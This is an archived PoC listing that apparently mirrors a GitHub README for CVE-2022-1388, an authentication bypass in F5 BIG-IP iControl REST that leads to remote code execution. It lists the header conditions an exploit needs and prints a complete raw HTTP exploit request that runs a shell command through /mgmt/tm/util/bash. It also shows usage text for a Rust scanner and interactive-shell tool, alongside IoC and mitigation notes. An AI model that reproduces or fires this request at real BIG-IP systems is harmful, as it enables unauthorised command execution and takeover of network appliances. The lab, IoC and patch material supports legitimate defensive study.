Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-1388 PoC — F5 BIG-IP 访问控制错误漏洞

Source
https://github.com/aancw/CVE-2022-1388-rs
Associated Vulnerability
Title:F5 BIG-IP 访问控制错误漏洞 (CVE-2022-1388)
Description:F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 F5 BIG-IP 存在访问控制错误漏洞,攻击者可以通过未公开的请求利用该漏洞绕过BIG-IP中的iControl REST身份验证来控制受影响的系统。
Description
CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE written in Rust
Readme
# CVE-2022-1388-rs
Scanner and Interactive shell for CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE written in Rust

## Summary
To wrap things up here is an overview of the necessary conditions of a request for exploiting this vulnerability:

- Connection header must include X-F5-Auth-Token
- X-F5-Auth-Token header must be present
- Host header must be localhost / 127.0.0.1 or the Connection header must include X-Forwarded-Host
- Auth header must be set with the admin username and any password

## PoC

```
POST /mgmt/tm/util/bash HTTP/1.1
Host: 127.0.0.1
Authorization: Basic YWRtaW46aG9yaXpvbjM=
X-F5-Auth-Token: thisisrandomstring
User-Agent: curl/7.82.0
Connection: X-F5-Auth-Token
Accept: */*
Content-Length: 39
{
    "command":"run",
    "utilCmdArgs":"-c id"
}
```

# Setup LAB

- You can find the lab <a href="https://github.com/aancw/CVE-2022-1388-rs/blob/main/LAB-PoC/README.md">Here</a>

## Usage

```
$ cve_2022_1308_rs -h

CVE-2022-1388 PoC 1.0
Petruknisme <me@petruknisme.com>
Scanner and Interactive shell for CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE written in
Rust

USAGE:
    cve_2022_1388_rs [OPTIONS] --url <URL>

OPTIONS:
    -h, --help         Print help information
    -s, --shell        This mode for accessing payload with interactive shell
    -u, --url <URL>    F5 Big-IP target url
    -V, --version      Print version information
```

## Requirements

- Rust
- Cargo


## IoCs

IOCs can be found in the `/var/log/audit` log file. Unrecognized commands executed by the `mgmt/tm/util/bash` endpoint should be cause for concern.

## Mitigation

Update to the latest version or mitigate by following the instructions within the F5 Security Advisory

- https://support.f5.com/csp/article/K23605346

## References
- https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
File Snapshot

 [4.0K]  /data/pocs/46469ee1d013c199edefa0b6f1323d7d33e59d10
├── [ 466]  Cargo.toml
├── [4.0K]  LAB-PoC
│   ├── [ 241]  Dockerfile
│   ├── [ 810]  main.py
│   ├── [  86]  Makefile
│   ├── [ 499]  README.md
│   └── [ 169]  requirements.txt
├── [1.0K]  LICENSE
├── [1.8K]  README.md
└── [4.0K]  src
    └── [4.0K]  main.rs

2 directories, 9 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.